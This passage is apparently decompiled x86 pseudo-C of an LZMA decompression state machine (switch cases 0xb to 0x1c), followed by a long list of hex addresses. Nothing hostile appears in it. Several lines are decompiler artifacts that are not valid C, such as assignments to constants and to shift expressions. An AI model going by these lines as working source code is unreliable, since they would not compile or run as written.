                                                                                            								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                            								goto L135;
                                                                                            							}
                                                                                            							__eax = _v44;
                                                                                            							goto L91;
                                                                                            						case 0xb:
                                                                                            							__eflags = _v68;
                                                                                            							if(_v68 != 0) {
                                                                                            								__ecx = _v40;
                                                                                            								__eax = _v36;
                                                                                            								_v36 = _v40;
                                                                                            							} else {
                                                                                            								__eax = _v40;
                                                                                            							}
                                                                                            							__ecx = _v44;
                                                                                            							_v40 = _v44;
                                                                                            							L91:
                                                                                            							__ecx = _v48;
                                                                                            							_v48 = __eax;
                                                                                            							_v44 = _v48;
                                                                                            							L92:
                                                                                            							__eax = _v8;
                                                                                            							_v132 = 0x15;
                                                                                            							__eax = _v8 + 0xa68;
                                                                                            							_v92 = _v8 + 0xa68;
                                                                                            							goto L71;
                                                                                            						case 0xc:
                                                                                            							L102:
                                                                                            							__eflags = _v112;
                                                                                            							if(_v112 == 0) {
                                                                                            								_v140 = 0xc;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							__ecx = _v116;
                                                                                            							__eax = _v16;
                                                                                            							_v20 = _v20 << 8;
                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                            							_v112 = _v112 - 1;
                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							_t340 =  &_v116;
                                                                                            							 *_t340 = _v116 + 1;
                                                                                            							__eflags =  *_t340;
                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							__eax = _v48;
                                                                                            							goto L104;
                                                                                            						case 0xd:
                                                                                            							L39:
                                                                                            							__eflags = _v112;
                                                                                            							if(_v112 == 0) {
                                                                                            								_v140 = 0xd;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							__ecx = _v116;
                                                                                            							__eax = _v16;
                                                                                            							_v20 = _v20 << 8;
                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                            							_v112 = _v112 - 1;
                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							_t127 =  &_v116;
                                                                                            							 *_t127 = _v116 + 1;
                                                                                            							__eflags =  *_t127;
                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							L41:
                                                                                            							__eax = _v68;
                                                                                            							__eflags = _v76 - _v68;
                                                                                            							if(_v76 != _v68) {
                                                                                            								goto L50;
                                                                                            							}
                                                                                            							__eflags = __ebx - 0x100;
                                                                                            							if(__ebx >= 0x100) {
                                                                                            								goto L56;
                                                                                            							}
                                                                                            							L43:
                                                                                            							__eax = _v95 & 0x000000ff;
                                                                                            							_v95 = _v95 << 1;
                                                                                            							__ecx = _v92;
                                                                                            							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                            							_v76 = __eax;
                                                                                            							__eax = __eax + 1;
                                                                                            							__eax = __eax << 8;
                                                                                            							__eax = __eax + __ebx;
                                                                                            							__esi = _v92 + __eax * 2;
                                                                                            							_v20 = _v20 >> 0xb;
                                                                                            							__ax =  *__esi;
                                                                                            							_v88 = __esi;
                                                                                            							__edx = __ax & 0x0000ffff;
                                                                                            							__ecx = (_v20 >> 0xb) * __edx;
                                                                                            							__eflags = _v16 - __ecx;
                                                                                            							if(_v16 >= __ecx) {
                                                                                            								_v20 = _v20 - __ecx;
                                                                                            								_v16 = _v16 - __ecx;
                                                                                            								__cx = __ax;
                                                                                            								_v68 = 1;
                                                                                            								__cx = __ax >> 5;
                                                                                            								__eflags = __eax;
                                                                                            								__ebx = __ebx + __ebx + 1;
                                                                                            								 *__esi = __ax;
                                                                                            							} else {
                                                                                            								_v68 = _v68 & 0x00000000;
                                                                                            								_v20 = __ecx;
                                                                                            								0x800 = 0x800 - __edx;
                                                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                            								__ebx = __ebx + __ebx;
                                                                                            								 *__esi = __cx;
                                                                                            							}
                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                            							_v72 = __ebx;
                                                                                            							if(_v20 >= 0x1000000) {
                                                                                            								goto L41;
                                                                                            							} else {
                                                                                            								goto L39;
                                                                                            							}
                                                                                            						case 0xe:
                                                                                            							L48:
                                                                                            							__eflags = _v112;
                                                                                            							if(_v112 == 0) {
                                                                                            								_v140 = 0xe;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							__ecx = _v116;
                                                                                            							__eax = _v16;
                                                                                            							_v20 = _v20 << 8;
                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                            							_v112 = _v112 - 1;
                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							_t161 =  &_v116;
                                                                                            							 *_t161 = _v116 + 1;
                                                                                            							__eflags =  *_t161;
                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							while(1) {
                                                                                            								L50:
                                                                                            								__eflags = __ebx - 0x100;
                                                                                            								if(__ebx >= 0x100) {
                                                                                            									break;
                                                                                            								}
                                                                                            								__eax = _v92;
                                                                                            								__edx = __ebx + __ebx;
                                                                                            								__ecx = _v20;
                                                                                            								__esi = __edx + __eax;
                                                                                            								__ecx = _v20 >> 0xb;
                                                                                            								__ax =  *__esi;
                                                                                            								_v88 = __esi;
                                                                                            								__edi = __ax & 0x0000ffff;
                                                                                            								__ecx = (_v20 >> 0xb) * __edi;
                                                                                            								__eflags = _v16 - __ecx;
                                                                                            								if(_v16 >= __ecx) {
                                                                                            									_v20 = _v20 - __ecx;
                                                                                            									_v16 = _v16 - __ecx;
                                                                                            									__cx = __ax;
                                                                                            									_t175 = __edx + 1; // 0x1
                                                                                            									__ebx = _t175;
                                                                                            									__cx = __ax >> 5;
                                                                                            									__eflags = __eax;
                                                                                            									 *__esi = __ax;
                                                                                            								} else {
                                                                                            									_v20 = __ecx;
                                                                                            									0x800 = 0x800 - __edi;
                                                                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            									__ebx = __ebx + __ebx;
                                                                                            									 *__esi = __cx;
                                                                                            								}
                                                                                            								__eflags = _v20 - 0x1000000;
                                                                                            								_v72 = __ebx;
                                                                                            								if(_v20 >= 0x1000000) {
                                                                                            									continue;
                                                                                            								} else {
                                                                                            									goto L48;
                                                                                            								}
                                                                                            							}
                                                                                            							L56:
                                                                                            							_t178 =  &_v56;
                                                                                            							 *_t178 = _v56 & 0x00000000;
                                                                                            							__eflags =  *_t178;
                                                                                            							goto L57;
                                                                                            						case 0xf:
                                                                                            							L60:
                                                                                            							__eflags = _v112;
                                                                                            							if(_v112 == 0) {
                                                                                            								_v140 = 0xf;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							__ecx = _v116;
                                                                                            							__eax = _v16;
                                                                                            							_v20 = _v20 << 8;
                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                            							_v112 = _v112 - 1;
                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							_t208 =  &_v116;
                                                                                            							 *_t208 = _v116 + 1;
                                                                                            							__eflags =  *_t208;
                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							L62:
                                                                                            							__eflags = __ebx - 0x100;
                                                                                            							if(__ebx >= 0x100) {
                                                                                            								L57:
                                                                                            								__al = _v72;
                                                                                            								_v96 = _v72;
                                                                                            								goto L58;
                                                                                            							}
                                                                                            							L63:
                                                                                            							__eax = _v92;
                                                                                            							__edx = __ebx + __ebx;
                                                                                            							__ecx = _v20;
                                                                                            							__esi = __edx + __eax;
                                                                                            							__ecx = _v20 >> 0xb;
                                                                                            							__ax =  *__esi;
                                                                                            							_v88 = __esi;
                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                            							__ecx = (_v20 >> 0xb) * __edi;
                                                                                            							__eflags = _v16 - __ecx;
                                                                                            							if(_v16 >= __ecx) {
                                                                                            								_v20 = _v20 - __ecx;
                                                                                            								_v16 = _v16 - __ecx;
                                                                                            								__cx = __ax;
                                                                                            								_t222 = __edx + 1; // 0x1
                                                                                            								__ebx = _t222;
                                                                                            								__cx = __ax >> 5;
                                                                                            								__eflags = __eax;
                                                                                            								 *__esi = __ax;
                                                                                            							} else {
                                                                                            								_v20 = __ecx;
                                                                                            								0x800 = 0x800 - __edi;
                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            								__ebx = __ebx + __ebx;
                                                                                            								 *__esi = __cx;
                                                                                            							}
                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                            							_v72 = __ebx;
                                                                                            							if(_v20 >= 0x1000000) {
                                                                                            								goto L62;
                                                                                            							} else {
                                                                                            								goto L60;
                                                                                            							}
                                                                                            						case 0x10:
                                                                                            							L112:
                                                                                            							__eflags = _v112;
                                                                                            							if(_v112 == 0) {
                                                                                            								_v140 = 0x10;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							__ecx = _v116;
                                                                                            							__eax = _v16;
                                                                                            							_v20 = _v20 << 8;
                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                            							_v112 = _v112 - 1;
                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							_t371 =  &_v116;
                                                                                            							 *_t371 = _v116 + 1;
                                                                                            							__eflags =  *_t371;
                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							goto L114;
                                                                                            						case 0x11:
                                                                                            							L71:
                                                                                            							__esi = _v92;
                                                                                            							_v136 = 0x12;
                                                                                            							goto L135;
                                                                                            						case 0x12:
                                                                                            							__eflags = _v68;
                                                                                            							if(_v68 != 0) {
                                                                                            								__eax = _v92;
                                                                                            								_v136 = 0x13;
                                                                                            								__esi = _v92 + 2;
                                                                                            								L135:
                                                                                            								_v88 = _t626;
                                                                                            								goto L136;
                                                                                            							}
                                                                                            							__eax = _v80;
                                                                                            							_v52 = _v52 & 0x00000000;
                                                                                            							__ecx = _v92;
                                                                                            							__eax = _v80 << 4;
                                                                                            							__eflags = __eax;
                                                                                            							__eax = _v92 + __eax + 4;
                                                                                            							goto L133;
                                                                                            						case 0x13:
                                                                                            							__eflags = _v68;
                                                                                            							if(_v68 != 0) {
                                                                                            								_t475 =  &_v92;
                                                                                            								 *_t475 = _v92 + 0x204;
                                                                                            								__eflags =  *_t475;
                                                                                            								_v52 = 0x10;
                                                                                            								_v68 = 8;
                                                                                            								L147:
                                                                                            								_v128 = 0x14;
                                                                                            								goto L148;
                                                                                            							}
                                                                                            							__eax = _v80;
                                                                                            							__ecx = _v92;
                                                                                            							__eax = _v80 << 4;
                                                                                            							_v52 = 8;
                                                                                            							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                                            							L133:
                                                                                            							_v92 = __eax;
                                                                                            							_v68 = 3;
                                                                                            							goto L147;
                                                                                            						case 0x14:
                                                                                            							_v52 = _v52 + __ebx;
                                                                                            							__eax = _v132;
                                                                                            							goto L143;
                                                                                            						case 0x15:
                                                                                            							__eax = 0;
                                                                                            							__eflags = _v60 - 7;
                                                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            							__al = __al & 0x000000fd;
                                                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                            							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                                            							goto L123;
                                                                                            						case 0x16:
                                                                                            							__eax = _v52;
                                                                                            							__eflags = __eax - 4;
                                                                                            							if(__eax >= 4) {
                                                                                            								_push(3);
                                                                                            								_pop(__eax);
                                                                                            							}
                                                                                            							__ecx = _v8;
                                                                                            							_v68 = 6;
                                                                                            							__eax = __eax << 7;
                                                                                            							_v128 = 0x19;
                                                                                            							_v92 = __eax;
                                                                                            							goto L148;
                                                                                            						case 0x17:
                                                                                            							L148:
                                                                                            							__eax = _v68;
                                                                                            							_v84 = 1;
                                                                                            							_v76 = _v68;
                                                                                            							goto L152;
                                                                                            						case 0x18:
                                                                                            							L149:
                                                                                            							__eflags = _v112;
                                                                                            							if(_v112 == 0) {
                                                                                            								_v140 = 0x18;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							__ecx = _v116;
                                                                                            							__eax = _v16;
                                                                                            							_v20 = _v20 << 8;
                                                                                            							__ecx =  *_v116 & 0x000000ff;
                                                                                            							_v112 = _v112 - 1;
                                                                                            							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							_t490 =  &_v116;
                                                                                            							 *_t490 = _v116 + 1;
                                                                                            							__eflags =  *_t490;
                                                                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                            							L151:
                                                                                            							_t493 =  &_v76;
                                                                                            							 *_t493 = _v76 - 1;
                                                                                            							__eflags =  *_t493;
                                                                                            							L152:
                                                                                            							__eflags = _v76;
                                                                                            							if(_v76 <= 0) {
                                                                                            								__ecx = _v68;
                                                                                            								__ebx = _v84;
                                                                                            								0 = 1;
                                                                                            								__eax = 1 << __cl;
                                                                                            								__ebx = _v84 - (1 << __cl);
                                                                                            								__eax = _v128;
                                                                                            								_v72 = __ebx;
                                                                                            								L143:
                                                                                            								_v140 = _t561;
                                                                                            								goto L3;
                                                                                            							}
                                                                                            							__eax = _v84;
                                                                                            							_v20 = _v20 >> 0xb;
                                                                                            							__edx = _v84 + _v84;
                                                                                            							__eax = _v92;
                                                                                            							__esi = __edx + __eax;
                                                                                            							_v88 = __esi;
                                                                                            							__ax =  *__esi;
                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                            							__ecx = (_v20 >> 0xb) * __edi;
                                                                                            							__eflags = _v16 - __ecx;
                                                                                            							if(_v16 >= __ecx) {
                                                                                            								_v20 = _v20 - __ecx;
                                                                                            								_v16 = _v16 - __ecx;
                                                                                            								__cx = __ax;
                                                                                            								__cx = __ax >> 5;
                                                                                            								__eax = __eax - __ecx;
                                                                                            								__edx = __edx + 1;
                                                                                            								__eflags = __edx;
                                                                                            								 *__esi = __ax;
                                                                                            								_v84 = __edx;
                                                                                            							} else {
                                                                                            								_v20 = __ecx;
                                                                                            								0x800 = 0x800 - __edi;
                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            								_v84 = _v84 << 1;
                                                                                            								 *__esi = __cx;
                                                                                            							}
                                                                                            							__eflags = _v20 - 0x1000000;
                                                                                            							if(_v20 >= 0x1000000) {
                                                                                            								goto L151;
                                                                                            							} else {
                                                                                            								goto L149;
                                                                                            							}
                                                                                            						case 0x19:
                                                                                            							__eflags = __ebx - 4;
                                                                                            							if(__ebx < 4) {
                                                                                            								_v48 = __ebx;
                                                                                            								L122:
                                                                                            								_t399 =  &_v48;
                                                                                            								 *_t399 = _v48 + 1;
                                                                                            								__eflags =  *_t399;
                                                                                            								L123:
                                                                                            								__eax = _v48;
                                                                                            								__eflags = __eax;
                                                                                            								if(__eax == 0) {
                                                                                            									_v52 = _v52 | 0xffffffff;
                                                                                            									goto L173;
                                                                                            								}
                                                                                            								__eflags = __eax - _v100;
                                                                                            								if(__eax > _v100) {
                                                                                            									goto L174;
                                                                                            								}
                                                                                            								_v52 = _v52 + 2;
                                                                                            								__eax = _v52;
                                                                                            								_t406 =  &_v100;
                                                                                            								 *_t406 = _v100 + _v52;
                                                                                            								__eflags =  *_t406;
                                                                                            								goto L126;
                                                                                            							}
                                                                                            							__ecx = __ebx;
                                                                                            							__eax = __ebx;
                                                                                            							__ecx = __ebx >> 1;
                                                                                            							__eax = __ebx & 0x00000001;
                                                                                            							__ecx = (__ebx >> 1) - 1;
                                                                                            							__al = __al | 0x00000002;
                                                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                                                            							__eflags = __ebx - 0xe;
                                                                                            							_v48 = __eax;
                                                                                            							if(__ebx >= 0xe) {
                                                                                            								__ebx = 0;
                                                                                            								_v76 = __ecx;
                                                                                            								L105:
                                                                                            								__eflags = _v76;
                                                                                            								if(_v76 <= 0) {
                                                                                            									__eax = __eax + __ebx;
                                                                                            									_v68 = 4;
                                                                                            									_v48 = __eax;
                                                                                            									__eax = _v8;
                                                                                            									__eax = _v8 + 0x644;
                                                                                            									__eflags = __eax;
                                                                                            									L111:
                                                                                            									__ebx = 0;
                                                                                            									_v92 = __eax;
                                                                                            									_v84 = 1;
                                                                                            									_v72 = 0;
                                                                                            									_v76 = 0;
                                                                                            									L115:
                                                                                            									__eax = _v68;
                                                                                            									__eflags = _v76 - _v68;
                                                                                            									if(_v76 >= _v68) {
                                                                                            										_t397 =  &_v48;
                                                                                            										 *_t397 = _v48 + __ebx;
                                                                                            										__eflags =  *_t397;
                                                                                            										goto L122;
                                                                                            									}
                                                                                            									__eax = _v84;
                                                                                            									_v20 = _v20 >> 0xb;
                                                                                            									__edi = _v84 + _v84;
                                                                                            									__eax = _v92;
                                                                                            									__esi = __edi + __eax;
                                                                                            									_v88 = __esi;
                                                                                            									__ax =  *__esi;
                                                                                            									__ecx = __ax & 0x0000ffff;
                                                                                            									__edx = (_v20 >> 0xb) * __ecx;
                                                                                            									__eflags = _v16 - __edx;
                                                                                            									if(_v16 >= __edx) {
                                                                                            										__ecx = 0;
                                                                                            										_v20 = _v20 - __edx;
                                                                                            										__ecx = 1;
                                                                                            										_v16 = _v16 - __edx;
                                                                                            										__ebx = 1;
                                                                                            										__ecx = _v76;
                                                                                            										__ebx = 1 << __cl;
                                                                                            										__ecx = 1 << __cl;
                                                                                            										__ebx = _v72;
                                                                                            										__ebx = _v72 | __ecx;
                                                                                            										__cx = __ax;
                                                                                            										__cx = __ax >> 5;
                                                                                            										__eax = __eax - __ecx;
                                                                                            										__edi = __edi + 1;
                                                                                            										__eflags = __edi;
                                                                                            										_v72 = __ebx;
                                                                                            										 *__esi = __ax;
                                                                                            										_v84 = __edi;
                                                                                            									} else {
                                                                                            										_v20 = __edx;
                                                                                            										0x800 = 0x800 - __ecx;
                                                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                            										_v84 = _v84 << 1;
                                                                                            										 *__esi = __dx;
                                                                                            									}
                                                                                            									__eflags = _v20 - 0x1000000;
                                                                                            									if(_v20 >= 0x1000000) {
                                                                                            										L114:
                                                                                            										_t374 =  &_v76;
                                                                                            										 *_t374 = _v76 + 1;
                                                                                            										__eflags =  *_t374;
                                                                                            										goto L115;
                                                                                            									} else {
                                                                                            										goto L112;
                                                                                            									}
                                                                                            								}
                                                                                            								__ecx = _v16;
                                                                                            								__ebx = __ebx + __ebx;
                                                                                            								_v20 = _v20 >> 1;
                                                                                            								__eflags = _v16 - _v20;
                                                                                            								_v72 = __ebx;
                                                                                            								if(_v16 >= _v20) {
                                                                                            									__ecx = _v20;
                                                                                            									_v16 = _v16 - _v20;
                                                                                            									__ebx = __ebx | 0x00000001;
                                                                                            									__eflags = __ebx;
                                                                                            									_v72 = __ebx;
                                                                                            								}
                                                                                            								__eflags = _v20 - 0x1000000;
                                                                                            								if(_v20 >= 0x1000000) {
                                                                                            									L104:
                                                                                            									_t344 =  &_v76;
                                                                                            									 *_t344 = _v76 - 1;
                                                                                            									__eflags =  *_t344;
                                                                                            									goto L105;
                                                                                            								} else {
                                                                                            									goto L102;
                                                                                            								}
                                                                                            							}
                                                                                            							__edx = _v8;
                                                                                            							__eax = __eax - __ebx;
                                                                                            							_v68 = __ecx;
                                                                                            							__eax = _v8 + 0x55e + __eax * 2;
                                                                                            							goto L111;
                                                                                            						case 0x1a:
                                                                                            							L58:
                                                                                            							__eflags = _v104;
                                                                                            							if(_v104 == 0) {
                                                                                            								_v140 = 0x1a;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							__ecx = _v108;
                                                                                            							__al = _v96;
                                                                                            							__edx = _v12;
                                                                                            							_v100 = _v100 + 1;
                                                                                            							_v108 = _v108 + 1;
                                                                                            							_v104 = _v104 - 1;
                                                                                            							 *_v108 = __al;
                                                                                            							__ecx = _v24;
                                                                                            							 *(_v12 + __ecx) = __al;
                                                                                            							__eax = __ecx + 1;
                                                                                            							__edx = 0;
                                                                                            							_t197 = __eax % _v120;
                                                                                            							__eax = __eax / _v120;
                                                                                            							__edx = _t197;
                                                                                            							goto L82;
                                                                                            						case 0x1b:
                                                                                            							L78:
                                                                                            							__eflags = _v104;
                                                                                            							if(_v104 == 0) {
                                                                                            								_v140 = 0x1b;
                                                                                            								goto L173;
                                                                                            							}
                                                                                            							__eax = _v24;
                                                                                            							__eax = _v24 - _v48;
                                                                                            							__eflags = __eax - _v120;
                                                                                            							if(__eax >= _v120) {
                                                                                            								__eax = __eax + _v120;
                                                                                            								__eflags = __eax;
                                                                                            							}
                                                                                            							__edx = _v12;
                                                                                            							__cl =  *(__edx + __eax);
                                                                                            							__eax = _v24;
                                                                                            							_v96 = __cl;
                                                                                            							 *(__edx + __eax) = __cl;
                                                                                            							__eax = __eax + 1;
                                                                                            							__edx = 0;
                                                                                            							_t280 = __eax % _v120;
                                                                                            							__eax = __eax / _v120;
                                                                                            							__edx = _t280;
                                                                                            							__eax = _v108;
                                                                                            							_v100 = _v100 + 1;
                                                                                            							_v108 = _v108 + 1;
                                                                                            							_t289 =  &_v104;
                                                                                            							 *_t289 = _v104 - 1;
                                                                                            							__eflags =  *_t289;
                                                                                            							 *_v108 = __cl;
                                                                                            							L82:
                                                                                            							_v24 = __edx;
                                                                                            							goto L83;
                                                                                            						case 0x1c:
                                                                                            							while(1) {
                                                                                            								L126:
                                                                                            								__eflags = _v104;
                                                                                            								if(_v104 == 0) {
                                                                                            									break;
                                                                                            								}
                                                                                            								__eax = _v24;
                                                                                            								__eax = _v24 - _v48;
                                                                                            								__eflags = __eax - _v120;
                                                                                            								if(__eax >= _v120) {
                                                                                            									__eax = __eax + _v120;
                                                                                            									__eflags = __eax;
                                                                                            								}
                                                                                            								__edx = _v12;
                                                                                            								__cl =  *(__edx + __eax);
                                                                                            								__eax = _v24;
                                                                                            								_v96 = __cl;
                                                                                            								 *(__edx + __eax) = __cl;
                                                                                            								__eax = __eax + 1;
                                                                                            								__edx = 0;
                                                                                            								_t420 = __eax % _v120;
                                                                                            								__eax = __eax / _v120;
                                                                                            								__edx = _t420;
                                                                                            								__eax = _v108;
                                                                                            								_v108 = _v108 + 1;
                                                                                            								_v104 = _v104 - 1;
                                                                                            								_v52 = _v52 - 1;
                                                                                            								__eflags = _v52;
                                                                                            								 *_v108 = __cl;
                                                                                            								_v24 = _t420;
                                                                                            								if(_v52 > 0) {
                                                                                            									continue;
                                                                                            								} else {
                                                                                            									L83:
                                                                                            									_v140 = 2;
                                                                                            									goto L3;
                                                                                            								}
                                                                                            							}
                                                                                            							_v140 = 0x1c;
                                                                                            							L173:
                                                                                            							_push(0x22);
                                                                                            							_pop(_t574);
                                                                                            							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                            							return 0;
                                                                                            					}
                                                                                            				}
                                                                                            				L174:
                                                                                            				_t538 = _t537 | 0xffffffff;
                                                                                            				return _t538;
                                                                                            			}










































                                                                                            0x00405ead
                                                                                            0x00405eb4
                                                                                            0x00405eba
                                                                                            0x00405ec0
                                                                                            0x00000000
                                                                                            0x00405ec4
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed0
                                                                                            0x00405ed9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405edf
                                                                                            0x00000000
                                                                                            0x00405ee6
                                                                                            0x00405eea
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ef3
                                                                                            0x00405ef6
                                                                                            0x00405ef9
                                                                                            0x00405efb
                                                                                            0x00405efd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f03
                                                                                            0x00405f06
                                                                                            0x00405f08
                                                                                            0x00405f09
                                                                                            0x00405f0c
                                                                                            0x00405f0e
                                                                                            0x00405f0f
                                                                                            0x00405f11
                                                                                            0x00405f14
                                                                                            0x00405f19
                                                                                            0x00405f1e
                                                                                            0x00405f27
                                                                                            0x00405f3a
                                                                                            0x00405f3d
                                                                                            0x00405f46
                                                                                            0x00405f49
                                                                                            0x00405f71
                                                                                            0x00405f71
                                                                                            0x00405f73
                                                                                            0x00405f81
                                                                                            0x00405f81
                                                                                            0x00405f85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f75
                                                                                            0x00405f78
                                                                                            0x00405f78
                                                                                            0x00405f79
                                                                                            0x00405f79
                                                                                            0x00000000
                                                                                            0x00405f75
                                                                                            0x00405f4b
                                                                                            0x00405f4f
                                                                                            0x00405f54
                                                                                            0x00405f54
                                                                                            0x00405f5d
                                                                                            0x00405f63
                                                                                            0x00405f65
                                                                                            0x00405f68
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f6e
                                                                                            0x00000000
                                                                                            0x00405f8b
                                                                                            0x00405f8b
                                                                                            0x00405f8f
                                                                                            0x0040683b
                                                                                            0x00000000
                                                                                            0x0040683b
                                                                                            0x00405f98
                                                                                            0x00405fa8
                                                                                            0x00405fab
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fae
                                                                                            0x00405fb1
                                                                                            0x00405fb1
                                                                                            0x00405fb5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405fb7
                                                                                            0x00405fba
                                                                                            0x00405fbd
                                                                                            0x00405fe7
                                                                                            0x00405fed
                                                                                            0x00405ff4
                                                                                            0x00000000
                                                                                            0x00405ff4
                                                                                            0x00405fbf
                                                                                            0x00405fc3
                                                                                            0x00405fc6
                                                                                            0x00405fcb
                                                                                            0x00405fcb
                                                                                            0x00405fd6
                                                                                            0x00405fdc
                                                                                            0x00405fde
                                                                                            0x00405fe1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406026
                                                                                            0x0040602c
                                                                                            0x0040602f
                                                                                            0x0040603c
                                                                                            0x00406044
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405ffb
                                                                                            0x00405ffb
                                                                                            0x00405fff
                                                                                            0x0040684a
                                                                                            0x00000000
                                                                                            0x0040684a
                                                                                            0x0040600b
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406016
                                                                                            0x00406019
                                                                                            0x0040601c
                                                                                            0x0040601f
                                                                                            0x00406022
                                                                                            0x00406024
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004066bb
                                                                                            0x004066bb
                                                                                            0x004066c1
                                                                                            0x004066c7
                                                                                            0x004066ca
                                                                                            0x004066cd
                                                                                            0x004066e7
                                                                                            0x004066ea
                                                                                            0x004066f0
                                                                                            0x004066fb
                                                                                            0x004066fb
                                                                                            0x004066fd
                                                                                            0x004066cf
                                                                                            0x004066cf
                                                                                            0x004066de
                                                                                            0x004066e2
                                                                                            0x004066e2
                                                                                            0x00406700
                                                                                            0x00406707
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406709
                                                                                            0x00406709
                                                                                            0x0040670d
                                                                                            0x004068bc
                                                                                            0x00000000
                                                                                            0x004068bc
                                                                                            0x00406719
                                                                                            0x00406720
                                                                                            0x00406728
                                                                                            0x00406728
                                                                                            0x00406728
                                                                                            0x0040672b
                                                                                            0x0040672e
                                                                                            0x0040672e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040604c
                                                                                            0x0040604e
                                                                                            0x00406051
                                                                                            0x004060c2
                                                                                            0x004060c5
                                                                                            0x004060c8
                                                                                            0x004060cf
                                                                                            0x004060d9
                                                                                            0x00000000
                                                                                            0x004060d9
                                                                                            0x00406053
                                                                                            0x00406057
                                                                                            0x0040605a
                                                                                            0x0040605c
                                                                                            0x0040605f
                                                                                            0x00406062
                                                                                            0x00406064
                                                                                            0x00406067
                                                                                            0x00406069
                                                                                            0x0040606e
                                                                                            0x00406071
                                                                                            0x00406074
                                                                                            0x00406078
                                                                                            0x0040607f
                                                                                            0x00406082
                                                                                            0x00406089
                                                                                            0x0040608d
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x00406095
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x0040608f
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406084
                                                                                            0x00406099
                                                                                            0x0040609c
                                                                                            0x004060ba
                                                                                            0x004060bc
                                                                                            0x00000000
                                                                                            0x004060bc
                                                                                            0x0040609e
                                                                                            0x004060a1
                                                                                            0x004060a4
                                                                                            0x004060a7
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060ac
                                                                                            0x004060af
                                                                                            0x004060b1
                                                                                            0x004060b2
                                                                                            0x004060b5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004062eb
                                                                                            0x004062ef
                                                                                            0x0040630d
                                                                                            0x00406310
                                                                                            0x00406317
                                                                                            0x0040631a
                                                                                            0x0040631d
                                                                                            0x00406320
                                                                                            0x00406323
                                                                                            0x00406326
                                                                                            0x00406328
                                                                                            0x0040632f
                                                                                            0x00406330
                                                                                            0x00406332
                                                                                            0x00406335
                                                                                            0x00406338
                                                                                            0x0040633b
                                                                                            0x0040633b
                                                                                            0x00406340
                                                                                            0x00000000
                                                                                            0x00406340
                                                                                            0x004062f1
                                                                                            0x004062f4
                                                                                            0x004062f7
                                                                                            0x00406301
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406355
                                                                                            0x00406359
